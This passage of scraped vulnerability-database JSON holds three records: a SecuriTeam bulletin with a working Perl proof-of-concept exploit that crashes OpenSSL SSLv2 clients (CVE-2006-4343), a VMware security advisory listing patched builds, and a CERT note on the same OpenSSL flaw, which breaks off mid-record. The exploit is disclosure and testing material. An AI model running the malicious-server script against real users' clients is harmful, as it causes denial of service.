ServerHello packets allows \r\nremote attackers to cause the client connecting to it to crash, the \r\nfollowing exploit code can be used to test your client for the \r\nvulnerability.\r\n\r\nDETAILS\r\n\r\nVulnerable Systems:\r\n * OpenSSL version 0.9.7 before 0.9.7l\r\n * OpenSSL version 0.9.8 before 0.9.8d\r\n\r\nImmune Systems:\r\n * OpenSSL version 0.9.7l\r\n * OpenSSL version 0.9.8d\r\n\r\nExploit:\r\n#!/usr/bin/perl\r\n# Copyright&#40;c&#41; Beyond Security\r\n# Written by Noam Rathaus - based on beSTORM&#39;s SSL Server module\r\n# Exploits vulnerability CVE-2006-4343 - where the SSL client can be \r\ncrashed by special SSL serverhello response\r\n\r\nuse strict;\r\nuse IO::Socket;\r\nmy $sock = new IO::Socket::INET &#40; LocalPort =&gt; &#39;443&#39;, Proto =&gt; &#39;tcp&#39;, \r\nListen =&gt; 1, Reuse =&gt; 1, &#41;;\r\ndie &quot;Could not create socket: $!&#92;n&quot; unless $sock;\r\n \r\nmy $TIMEOUT = 0.5;\r\nmy $line;\r\nmy $new_sock;\r\nsrand&#40;time&#40;&#41;&#41;;\r\n\r\nwhile &#40; $new_sock = $sock-&gt;accept&#40;&#41; &#41;\r\n{\r\n printf &#40;&quot;new connection&#92;n&quot;&#41;;\r\n my $rin;\r\n my $line;\r\n my &#40;$nfound, $timeleft&#41; = select&#40;$rin, undef, undef, $TIMEOUT&#41; &amp;&amp; \r\nrecv&#40;$new_sock, $line, 1024, undef&#41;;\r\n\r\n my $ciphers = &quot;&quot;;\r\n my $ciphers_length = pack&#40;&#39;n&#39;, length&#40;$ciphers&#41;&#41;;\r\n\r\n my $certificate = &quot;&quot;;\r\n my $certificate_length = pack&#40;&#39;n&#39;, length&#40;$certificate&#41;&#41;;\r\n\r\n my $packet_sslv2 =\r\n&quot;&#92;x04&quot;.\r\n&quot;&#92;x01&quot;. # Hit &#40;default 0x01&#41;\r\n\r\n&quot;&#92;x00&quot;. # No certificate\r\n\r\n&quot;&#92;x00&#92;x02&quot;.\r\n$certificate_length.\r\n$ciphers_length.\r\n&quot;&#92;x00&#92;x10&quot;.\r\n# Certificate\r\n$certificate.\r\n# Done\r\n# Ciphers\r\n$ciphers.\r\n# Done\r\n&quot;&#92;xf5&#92;x61&#92;x1b&#92;xc4&#92;x0b&#92;x34&#92;x1b&#92;x11&#92;x3c&#92;x52&#92;xe9&#92;x93&#92;xd1&#92;xfa&#92;x29&#92;xe9&quot;;\r\n\r\n my $ssl_length = pack&#40;&#39;n&#39;, length&#40;$packet_sslv2&#41; + 0x8000&#41;;\r\n $packet_sslv2 = $ssl_length . $packet_sslv2;\r\n\r\n print $new_sock $packet_sslv2;\r\n\r\n close&#40;$new_sock&#41;;\r\n}\r\n\r\n\r\nADDITIONAL INFORMATION\r\n\r\nThe information has been provided by &lt;mailto:noamr@beyondsecurity.com&gt; \r\nNoam Rathaus.\r\nThe original article can be found at: \r\n&lt;http://www.beyondsecurity.com/bestorm_overview.html&gt; \r\nhttp://www.beyondsecurity.com/bestorm_overview.html\r\n\r\n\r\n\r\n======================================== \r\n\r\n\r\nThis bulletin is sent to members of the SecuriTeam mailing list. \r\nTo unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com \r\nIn order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com \r\n\r\n\r\n==================== \r\n==================== \r\n\r\nDISCLAIMER: \r\nThe information in this bulletin is provided &quot;AS IS&quot; without warranty of any kind. \r\nIn no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. \r\n\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2007-12-20T00:00:00", "title": "[EXPL] OpenSSL SSLv2 Client Crash &#40;NULL Reference&#41;", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2006-4343"], "modified": "2007-12-20T00:00:00", "id": "SECURITYVULNS:DOC:18695", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18695", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:25", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA256\r\n\r\n- -------------------------------------------------------------------\r\n~ VMware Security Advisory\r\n\r\nAdvisory ID: VMSA-2008-0005\r\nSynopsis: Updated VMware Workstation, VMware Player, VMware\r\n~ Server, VMware ACE, and VMware Fusion resolve\r\n~ critical security issues\r\nIssue date: 2008-03-17\r\nUpdated on: 2008-03-17 &#40;initial release of advisory&#41;\r\nCVE numbers: CVE-2008-0923 CVE-2008-0923 CVE-2008-1361\r\n~ CVE-2008-1362 CVE-2007-5269 CVE-2006-2940\r\n~ CVE-2006-2937 CVE-2006-4343 CVE-2006-4339\r\n~ CVE-2007-5618 CVE-2008-1364 CVE-2008-1363\r\n~ CVE-2008-1340\r\n- -------------------------------------------------------------------\r\n\r\n1. Summary:\r\n\r\n~ Several critical security vulnerabilities have been addressed\r\n~ in the newest releases of VMware&#39;s hosted product line.\r\n\r\n2. Relevant releases:\r\n\r\n~ VMware Workstation 6.0.2 and earlier\r\n~ VMware Workstation 5.5.4 and earlier\r\n~ VMware Player 2.0.2 and earlier\r\n~ VMware Player 1.0.4 and earlier\r\n~ VMware ACE 2.0.2 and earlier\r\n~ VMware ACE 1.0.2 and earlier\r\n~ VMware Server 1.0.4 and earlier\r\n~ VMware Fusion 1.1 and earlier\r\n\r\n3. Problem description:\r\n\r\n~ a. Host to guest shared folder &#40;HGFS&#41; traversal vulnerability\r\n\r\n~ On Windows hosts, if you have configured a VMware host to guest\r\n~ shared folder &#40;HGFS&#41;, it is possible for a program running in the\r\n~ guest to gain access to the host&#39;s file system and create or modify\r\n~ executable files in sensitive locations.\r\n\r\nNOTE: VMware Server is not affected because it doesn&#39;t use host to\r\n~ guest shared folders. No versions of ESX Server, including\r\n~ ESX Server 3i, are affected by this vulnerability. Because\r\n~ ESX Server is based on a bare-metal hypervisor architecture\r\n~ and not a hosted architecture, and it doesn&#39;t include any\r\n~ shared folder abilities. Fusion and Linux based hosted\r\n~ products are unaffected.\r\n\r\n~ VMware would like to thank CORE Security Technologies for\r\n~ working with us on this issue. This addresses advisory\r\n~ CORE-2007-0930.\r\n\r\n~ The Common Vulnerabilities and Exposures project &#40;cve.mitre.org&#41;\r\n~ has assigned the name CVE-2008-0923 to this issue.\r\n\r\n~ Hosted products\r\n~ ---------------\r\n~ VMware Workstation 6.0 upgrade to version 6.0.3 &#40;Build# 80004&#41;\r\n~ VMware Workstation 5.5 upgrade to version 5.5.6 &#40;Build# 80404&#41;\r\n~ VMware Player 2.0 upgrade to version 2.0.3 &#40;Build# 80004&#41;\r\n~ VMware Player 1.0 upgrade to version 1.0.6 &#40;Build# 80404&#41;\r\n~ VMware ACE 2.0 upgrade to version 2.0.1 &#40;Build# 80004&#41;\r\n~ VMware ACE 1.0 upgrade to version 1.0.5 &#40;Build# 79846&#41;\r\n\r\n~ b. Insecure named pipes\r\n\r\n~ An internal security audit determined that a malicious Windows\r\n~ user could attain and exploit LocalSystem privileges by causing\r\n~ the authd process to connect to a named pipe that is opened and\r\n~ controlled by the malicious user.\r\n\r\n~ The same internal security audit determined that a malicious\r\n~ Windows user could exploit an insecurely created named pipe\r\n~ object to escalate privileges or create a denial of service\r\n~ attack. In this situation, the malicious user could\r\n~ successfully impersonate authd and attain privileges under\r\n~ which Authd is executing.\r\n\r\n~ The Common Vulnerabilities and Exposures project &#40;cve.mitre.org&#41;\r\n~ has assigned the names CVE-2008-1361, CVE-2008-1362 to these\r\n~ issues.\r\n\r\n~ Windows Hosted products\r\n~ ---------------\r\n~ VMware Workstation 6.0 upgrade to version 6.0.3 &#40;Build# 80004&#41;\r\n~ VMware Workstation 5.5 upgrade to version 5.5.6 &#40;Build# 80404&#41;\r\n~ VMware Player 2.0 upgrade to version 2.0.3 &#40;Build# 80004&#41;\r\n~ VMware Player 1.0 upgrade to version 1.0.6 &#40;Build# 80404&#41;\r\n~ VMware Server 1.0 upgrade to version 1.0.5 &#40;Build# 80187&#41;\r\n~ VMware ACE 2.0 upgrade to version 2.0.1 &#40;Build# 80004&#41;\r\n~ VMware ACE 1.0 upgrade to version 1.0.5 &#40;Build# 79846&#41;\r\n\r\n~ c. Updated libpng library to version 1.2.22 to address various\r\n~ security vulnerabilities\r\n\r\n~ Several flaws were discovered in the way libpng handled various PNG\r\n~ image chunks. An attacker could create a carefully crafted PNG\r\n~ image file in such a way that it could cause an application linked\r\n~ with libpng to crash when the file was manipulated.\r\n\r\n~ The Common Vulnerabilities and Exposures project &#40;cve.mitre.org&#41;\r\n~ has assigned the name CVE-2007-5269 to this issue.\r\n\r\n~ Hosted products\r\n~ ---------------\r\n~ VMware Workstation 6.0 upgrade to version 6.0.3 &#40;Build# 80004&#41;\r\n~ VMware Workstation 5.5 upgrade to version 5.5.6 &#40;Build# 80404&#41;\r\n~ VMware Player 2.0 upgrade to version 2.0.3 &#40;Build# 80004&#41;\r\n~ VMware Player 1.0 upgrade to version 1.0.6 &#40;Build# 80404&#41;\r\n~ VMware Server 1.0 upgrade to version 1.0.5 &#40;Build# 80187&#41;\r\n~ VMware ACE 2.0 upgrade to version 2.0.1 &#40;Build# 80004&#41;\r\n~ VMware ACE 1.0 upgrade to version 1.0.5 &#40;Build# 79846&#41;\r\n\r\n~ NOTE: Fusion is not affected by this issue.\r\n\r\n~ d. Updated OpenSSL library to address various security vulnerabilities\r\n\r\n~ Updated OpenSSL fixes several security flaws were discovered\r\n~ in previous versions of OpenSSL.\r\n\r\n~ The Common Vulnerabilities and Exposures project &#40;cve.mitre.org&#41;\r\n~ assigned the following names to these issues: CVE-2006-2940,\r\n~ CVE-2006-2937, CVE-2006-4343, CVE-2006-4339.\r\n\r\n~ Hosted products\r\n~ ---------------\r\n~ VMware Workstation 6.0 upgrade to version 6.0.3 &#40;Build# 80004&#41;\r\n~ VMware Workstation 5.5 upgrade to version 5.5.6 &#40;Build# 80404&#41;\r\n~ VMware Player 2.0 upgrade to version 2.0.3 &#40;Build# 80004&#41;\r\n~ VMware Player 1.0 upgrade to version 1.0.6 &#40;Build# 80404&#41;\r\n~ VMware Server 1.0 upgrade to version 1.0.5 &#40;Build# 80187&#41;\r\n~ VMware ACE 2.0 upgrade to version 2.0.1 &#40;Build# 80004&#41;\r\n~ VMware ACE 1.0 upgrade to version 1.0.5 &#40;Build# 79846&#41;\r\n\r\n~ NOTE: Fusion is not affected by this issue.\r\n\r\n~ e. VIX API default setting changed to a more secure default value\r\n\r\n~ Workstation 6.0.2 allowed anonymous console access to the guest by\r\n~ means of the VIX API. This release, Workstation 6.0.3, disables\r\n~ this feature. This means that the Eclipse Integrated Virtual\r\n~ Debugger and the Visual Studio Integrated Virtual Debugger will now\r\n~ prompt for user account credentials to access a guest.\r\n\r\n~ Hosted products\r\n~ ---------------\r\n~ VMware Workstation 6.0 upgrade to version 6.0.3 &#40;Build# 80004&#41;\r\n~ VMware Player 2.0 upgrade to version 2.0.3 &#40;Build# 80004&#41;\r\n~ VMware ACE 2.0 upgrade to version 2.0.1 &#40;Build# 80004&#41;\r\n\r\n~ f. Windows 2000 based hosted products privilege escalation\r\n~ vulnerability\r\n\r\n~ This release addresses a potential privilege escalation on\r\n~ Windows 2000 hosted products. Certain services may be improperly\r\n~ registered and present a security vulnerability to Windows 2000\r\n~ machines.\r\n\r\n~ VMware would like to thank Ray Hicken for reporting this issue and\r\n~ David Maciejak for originally pointing out these types of\r\n~ vulnerabilities.\r\n\r\n~ The Common Vulnerabilities and Exposures project &#40;cve.mitre.org&#41;\r\n~ assigned the name CVE-2007-5618 to this issue.\r\n\r\n~ Windows versions of Hosted products\r\n~ ---------------\r\n~ VMware Workstation 6.0 upgrade to version 6.0.3 &#40;Build# 80004&#41;\r\n~ VMware Workstation 5.5 upgrade to version 5.5.6 &#40;Build# 80404&#41;\r\n~ VMware Player 2.0 upgrade to version 2.0.3 &#40;Build# 80004&#41;\r\n~ VMware Player 1.0 upgrade to version 1.0.6 &#40;Build# 80404&#41;\r\n~ VMware Server 1.0 upgrade to version 1.0.5 &#40;Build# 80187&#41;\r\n~ VMware ACE 2.0 upgrade to version 2.0.1 &#40;Build# 80004&#41;\r\n~ VMware ACE 1.0 upgrade to version 1.0.5 &#40;Build# 79846&#41;\r\n\r\n~ NOTE: Fusion and Linux based products are not affected by this\r\n~ issue.\r\n\r\n~ g. DHCP denial of service vulnerability\r\n\r\n~ A potential denial of service issue affects DHCP service running\r\n~ on the host.\r\n\r\n~ VMware would like to thank Martin O&#39;Neal for reporting this issue.\r\n\r\n~ The Common Vulnerabilities and Exposures project &#40;cve.mitre.org&#41;\r\n~ assigned the name CVE-2008-1364 to this issue.\r\n\r\n~ Hosted products\r\n~ ---------------\r\n~ VMware Workstation 5.5 upgrade to version 5.5.6 &#40;Build# 80404&#41;\r\n~ VMware Player 1.0 upgrade to version 1.0.6 &#40;Build# 80404&#41;\r\n~ VMware Server 1.0 upgrade to version 1.0.5 &#40;Build# 80187&#41;\r\n~ VMware ACE 1.0 upgrade to version 1.0.5 &#40;Build# 79846&#41;\r\n~ VMware Fusion 1.1 upgrade to version 1.1.1 &#40;Build# 72241&#41;\r\n\r\n~ NOTE: This issue doesn&#39;t affect the latest versions of VMware\r\n~ Workstation 6, VMware Player 2, and ACE 2 products.\r\n\r\n~ h. Local Privilege Escalation on Windows based platforms by\r\n~ Hijacking VMware VMX configuration file\r\n\r\n~ VMware uses a configuration file named &quot;config.ini&quot; which\r\n~ is located in the application data directory of all users.\r\n~ By manipulating this file, a user could gain elevated\r\n~ privileges by hijacking the VMware VMX process.\r\n\r\n~ VMware would like to thank Sun Bing for reporting the issue.\r\n\r\n~ The Common Vulnerabilities and Exposures project &#40;cve.mitre.org&#41;\r\n~ assigned the name CVE-2008-1363 to this issue.\r\n\r\n~ Windows based Hosted products\r\n~ ---------------\r\n~ VMware Workstation 6.0 upgrade to version 6.0.3 &#40;Build# 80004&#41;\r\n~ VMware Workstation 5.5 upgrade to version 5.5.6 &#40;Build# 80404&#41;\r\n~ VMware Player 2.0 upgrade to version 2.0.3 &#40;Build# 80004&#41;\r\n~ VMware Player 1.0 upgrade to version 1.0.6 &#40;Build# 80404&#41;\r\n~ VMware Server 1.0 upgrade to version 1.0.5 &#40;Build# 80187&#41;\r\n~ VMware ACE 2.0 upgrade to version 2.0.1 &#40;Build# 80004&#41;\r\n~ VMware ACE 1.0 upgrade to version 1.0.5 &#40;Build# 79846&#41;\r\n\r\n~ i. Virtual Machine Communication Interface &#40;VMCI&#41; memory corruption\r\n~ resulting in denial of service\r\n\r\n~ VMCI was introduced in VMware Workstation 6.0, VMware Player 2.0,\r\n~ and VMware ACE 2.0. It is an experimental, optional feature and\r\n~ it may be possible to crash the host system by making specially\r\n~ crafted calls to the VMCI interface. This may result in denial\r\n~ of service via memory exhaustion and memory corruption.\r\n\r\n~ VMware would like to thank Andrew Honig of the Department of\r\n~ Defense for reporting this issue.\r\n\r\n~ The Common Vulnerabilities and Exposures project &#40;cve.mitre.org&#41;\r\n~ assigned the name CVE-2008-1340 to this issue.\r\n\r\n~ Hosted products\r\n~ ---------------\r\n~ VMware Workstation 6.0 upgrade to version 6.0.3 &#40;Build# 80004&#41;\r\n~ VMware Player 2.0 upgrade to version 2.0.3 &#40;Build# 80004&#41;\r\n~ VMware ACE 2.0 upgrade to version 2.0.1 &#40;Build# 80004&#41;\r\n\r\n4. Solution:\r\n\r\nPlease review the Patch notes for your product and version and verify\r\nthe md5sum of your downloaded file.\r\n\r\n~ VMware Workstation 6.0.3\r\n~ ------------------------\r\n~ http://www.vmware.com/download/ws/\r\n~ Release notes:\r\n~ http://www.vmware.com/support/ws6/doc/releasenotes_ws6.html\r\n~ Windows binary\r\n~ md5sum: 323f054957066fae07735160b73b91e5\r\n~ RPM Installation file for 32-bit Linux\r\n~ md5sum: c44183ad11082f05593359efd220944e\r\n~ tar Installation file for 32-bit Linux\r\n~ md5sum: 57601f238106cb12c1dea303ad1b4820\r\n~ RPM Installation file for 64-bit Linux\r\n~ md5sum: e9ba644be4e39556724fa2901c5e94e9\r\n~ tar Installation file for 64-bit Linux\r\n~ md5sum: d8d423a76f99a94f598077d41685e9a9\r\n\r\n~ VMware Workstation 5.5.5\r\n~ ------------------------\r\n~ http://www.vmware.com/download/ws/ws5.html\r\n~ Release notes:\r\n~ http://www.vmware.com/support/ws55/doc/releasenotes_ws55.html\r\n~ Windows binary\r\n~ md5sum: 9c2dd94db5eed93d7f64e8d6ba8d8bd3\r\n~ Compressed Tar archive for 32-bit Linux\r\n~ md5sum: 77401c0842a151f0b2db0b4fcb0d16eb\r\n~ Linux RPM version for 32-bit Linux\r\n~ md5sum: c222b6db934deb9c1bb79b16b25a3202\r\n\r\n~ VMware Server 1.0.5\r\n~ -------------------\r\n~ http://www.vmware.com/download/server/\r\n~ Release notes:\r\n~ http://www.vmware.com/support/server/doc/releasenotes_server.html\r\n~ VMware Server for Windows 32-bit and 64-bit\r\n~ md5sum: 3c4a57310c55e17bf8e4a1059d5b36cc\r\n~ VMware Server Windows client package\r\n~ md5sum: cb3dd2439203dc510f4d95f06ba59d21\r\n~ VMware Server for Linux\r\n~ md5sum: 161dcbe5af9bbd9834a86bf7c599903e\r\n~ VMware Server for Linux rpm\r\n~ md5sum: fc3b81ed18b53eda943a992971e9f84a\r\n~ Management Interface\r\n~ md5sum: dd10d25895d9994bd27ca896152f48ef\r\n~ VMware Server Linux client package\r\n~ md5sum: aae18f1f7b8811b5499e3a358754d4f8\r\n\r\n~ VMware ACE 2.0.3 and 1.0.5\r\n~ --------------------------\r\n~ http://www.vmware.com/download/ace/\r\n~ Windows Release notes:\r\n~ http://www.vmware.com/support/ace2/doc/releasenotes_ace2.html\r\n\r\n~ VMware Fusion 1.1.1\r\n~ -------------------\r\n~ http://www.vmware.com/download/fusion/\r\n~ Release notes:\r\n~ http://www.vmware.com/support/fusion/doc/releasenotes_fusion.html\r\n~ md5sum: 38e116ec26b30e7a6ac47c249ef650d0\r\n\r\n~ VMware Player 2.0.3 and 1.0.6\r\n~ ----------------------\r\n~ http://www.vmware.com/download/player/\r\n~ Release notes Player 1.x:\r\n~ http://www.vmware.com/support/player/doc/releasenotes_player.html\r\n~ Release notes Player 2.0\r\n~ http://www.vmware.com/support/player2/doc/releasenotes_player2.html\r\n~ 2.0.3 Windows binary\r\n~ md5sum: 0c5009d3b569687ae139e13d24c868d3\r\n~ VMware Player 2.0.3 for Linux &#40;.rpm&#41;\r\n~ md5sum: 53502b2112a863356dcd13dd0d8dd8f2\r\n~ VMware Player 2.0.3 for Linux &#40;.tar&#41;\r\n~ md5sum: 2305fcff49bef6e4ad83742412eac978\r\n~ VMware Player 2.0.3 - 64-bit &#40;.rpm&#41;\r\n~ md5sum: cf945b571c4d96146ede010286fdfca5\r\n~ VMware Player 2.0.3 - 64-bit &#40;.tar&#41;\r\n~ md5sum: f99c5b293eb87c5f918ad24111565b9f\r\n~ 1.0.6 Windows binary\r\n~ md5sum: 895081406c4de5361a1700ec0473e49c\r\n~ Player 1.0.6 for Linux &#40;.rpm&#41;\r\n~ md5sum: 8adb23799dd2014be0b6d77243c76942\r\n~ Player 1.0.6 for Linux &#40;.tar&#41;\r\n~ md5sum: c358f8e1387fb60863077d6f8a9f7b3f\r\n\r\n5. References:\r\n\r\n~ CVE numbers\r\n~ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0923\r\n~ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1361\r\n~ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1362\r\n~ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5269\r\n~ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940\r\n~ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937\r\n~ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343\r\n~ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4339\r\n~ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5618\r\n~ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1364\r\n~ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1363\r\n~ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1340\r\n\r\n- -------------------------------------------------------------------\r\n6. Contact:\r\n\r\nE-mail list for product security notifications and announcements:\r\nhttp://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\r\n\r\nThis Security Advisory is posted to the following lists:\r\n\r\n~ * security-announce@lists.vmware.com\r\n~ * bugtraq@securityfocus.com\r\n~ * full-disclosure@lists.grok.org.uk\r\n\r\nE-mail: security@vmware.com\r\n\r\nSecurity web site\r\nhttp://www.vmware.com/security\r\n\r\nVMware security response policy\r\nhttp://www.vmware.com/support/policies/security_response.html\r\n\r\nGeneral support life cycle policy\r\nhttp://www.vmware.com/support/policies/eos.html\r\n\r\nVMware Infrastructure support life cycle policy\r\nhttp://www.vmware.com/support/policies/eos_vi.html\r\n\r\nCopyright 2008 VMware Inc. All rights reserved.\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.7 &#40;GNU/Linux&#41;\r\n\r\niD8DBQFH3yTxS2KysvBH1xkRCHq8AJ0QOMocv/gSz/hgdojA39PGVO6pUACePCRv\r\nCv8MnL2bYPyDfYQ3f4IUL+w=\r\n=tFXS\r\n-----END PGP SIGNATURE-----", "edition": 1, "cvss3": {}, "published": "2008-03-18T00:00:00", "title": "VMSA-2008-0005 Updated VMware Workstation, VMware Player, VMware Server, VMware ACE, and VMware Fusion resolve critical security issues", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2007-5618", "CVE-2006-2940", "CVE-2006-2937", "CVE-2008-1361", "CVE-2006-4343", "CVE-2006-4339", "CVE-2007-5269", "CVE-2008-1364", "CVE-2008-0923", "CVE-2008-1363", "CVE-2008-1340", "CVE-2008-1362"], "modified": "2008-03-18T00:00:00", "id": "SECURITYVULNS:DOC:19438", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19438", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "cert": [{"lastseen": "2021-09-28T17:50:16", "description": "### Overview\n\nA flaw in the OpenSSL library could allow a remote attacker to cause a denial of service on an affected application.\n\n### Description\n\nThe [OpenSSL](<http://www.openssl.org/>) toolkit implements the Secure Sockets Layer (SSL versions 2 and 3) and Transport Layer Security (TLS version 1) protocols as well as a general purpose cryptographic library. A missing check for NULL exists in the SSLv2 client `get_server_hello()` function. As a result, an affected client application using OpenSSL to create an SSLv2 connection to a malicious server could be caused to crash. \n \n--- \n \n### Impact\n\nA remote attacker could cause an affected client application to crash, creating a denial of service. \n \n--- \n \n### Solution\n\n**Upgrade or apply a patch from the vendor**\n\nPatches have been released to address this issue. Please see the Systems Affected section of this document for more information. \n \nUsers or redistributors who compile OpenSSL from the original source code distribution are encouraged to review [OpenSSL Security Advisory [28th September 2006]](<http://www.openssl.org/news/secadv_20060928.txt>) and upgrade to the appropriate fixed version of the software. \n \n--- \n \n### Vendor Information\n\n386964\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Debian GNU/Linux __ Affected\n\nNotified: September 15, 2006 Updated: October 02, 2006 \n\n**Statement Date: September 29, 2006**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Addendum\n\nDebian has published [Debian Security Advisory DSA 1185](<http://www.debian.org/security/2006/dsa-1185>) in response to this issue. Users are encouraged to review this advisory and apply the patches it refers to.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23386964 Feedback>).\n\n### F5 Networks, Inc. __ Affected\n\nNotified: September 15, 2006 Updated: September 21, 2006 \n\n**Statement Date: September 21, 2006**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\n`For F5 products BIG-IP, FirePass and EM, this is a local vulnerability, and per \nour policy, will be addressed during the next maintenance release for each \nproduct.`\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### FreeBSD, Inc. __ Affected\n\nNotified: September 15, 2006 Updated: September 28, 2006 \n\n**Statement Date: September 28, 2006**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Addendum\n\nThe FreeBSD project has published FreeBSD Security Advisory [FreeBSD-SA-06:23.openssl](<http://security.freebsd.org/advisories/FreeBSD-SA-06:23.openssl.asc>) in response to this issue. Users are encouraged to review this advisory and apply the patches it refers to.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23386964 Feedback>).\n\n### OpenPKG __ Affected\n\nUpdated: October 02, 2006 \n\n**Statement Date: September 29, 2006**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Addendum\n\nThe OpenPKG team has published OpenPKG Security Advisory [OpenPKG-SA-2006.021](<http://www.openpkg.org/security/advisories/OpenPKG-SA-2006.021-openssl.html>) in response to this issue. Users are encouraged to review this advisory and apply the patches it refers to.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23386964 Feedback>).\n\n### OpenSSL __ Affected\n\nNotified: September 06, 2006 Updated: September 28, 2006 \n\n**Statement Date: September 28, 2006**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Addendum\n\nThe OpenSSL development team has published [OpenSSL Security Advisory [28th September 2006]](<http://www.openssl.org/news/secadv_20060928.txt>) in response to this issue. Users or redistributors who compile OpenSSL from the original source code distribution are encouraged to review this advisory and upgrade to the appropriate fixed version of the software.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23386964 Feedback>).\n\n### Oracle Corporation __ Affected\n\nUpdated: January 17, 2007 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Addendum\n\nRefer to <http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html>. \n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23386964 Feedback>